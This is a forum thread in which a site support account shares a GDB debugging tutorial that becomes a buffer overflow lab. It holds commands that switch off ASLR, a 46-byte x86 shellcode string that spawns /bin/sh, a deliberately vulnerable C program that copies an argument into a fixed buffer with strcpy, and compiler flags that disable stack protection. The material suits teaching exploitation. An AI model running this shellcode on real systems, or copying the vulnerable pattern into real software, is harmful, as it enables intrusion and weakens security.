Monday, October 2, 2023
Latest:

QUE.com

Mgmt of Assets & Joint Ventures | CyberSecurity Robotics AI/ML Blockchain

Debugging – GDB Tutorial

QUE.com Forums 48 – Programming Debugging – GDB Tutorial

Tagged: 

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • February 7, 2021 at 6:18 pm #43133
    Support @QUE.COM
    Keymaster

    You need to know how to debug your program to make it easier to correct any bugs. Here’s a tutorial video using GDB or GNU Debugger tool.

    February 12, 2021 at 5:43 am #43215
    Support @QUE.COM
    Keymaster

    Additional resources.
    http://www.brendangregg.com/blog/2016-08-09/gdb-example-ncurses.html (GDB)
    http://phrack.org/issues/49/14.html (Buffer Overflow Concepts)
    https://www.cprogramming.com/gdb.html (GDB)
    https://docs.python.org/3/tutorial/
    https://www.hacksplaining.com ( For SQL injection / Javascript / XSS/ CSRF Vulnerabilities)

    February 13, 2021 at 2:33 pm #43247
    Support @QUE.COM
    Keymaster

    Another good tutorial using GDB program.

    NOTE: If this tutorial is not working it is likely that you have aslr enabled. To disable it run the following command in your terminal
    echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
    When you are finished I strongly recommend you turn it back on with the command
    echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

    The 46 byte shellcode (x86*) used in this program is
    “\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”

    # Sample buffer overflow program.
    Save to example.c program

    
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]){
	char buf[256];
	strcpy(buf, argv[1]);
	printf("%s\n", buf);
	return 0;
}
    February 14, 2021 at 3:39 am #43258
    Support @QUE.COM
    Keymaster

    1. gcc -o example example.c // compile your program
    2. gdb ./example // run GNU Debug
    3. (gdb) disas main // run disassembly main
    take note of the address, this is for 64bit.

    Now for 32bits compile code.
    gcc -o example -fno-stack-protector -m32 -z execstack example.c // not working
    gcc -o example -m32 example.c
    Command: gcc -m32 geek.c -o geek

    fatal error: bits/predefs.h: No such file or directory
    Then it indicates that a standard library of gcc is been missing. In that case you must install gcc-multlib by using the following command:

    For C language:
    sudo apt-get install gcc-multilib

    alias python=python3 // to set python to python3

    to anyone getting :
    Cannot insert breakpoint 1.
    Cannot access memory at address xxxxxx

    the displayed memory addresses when you run disassemble main at first are not correct .
    to get the correct ones run the commands as follow:

    gdb ./example
    run aaaaawhatever
    disassemble main or disas main

    now you get the correct ones copy it and quit gdb
    gdb ./example
    break *the address you copied

    now running the command (run $(python ……..) will work.

  • Author
    Posts
Viewing 4 posts - 1 through 4 (of 4 total)
  • You must be logged in to reply to this topic.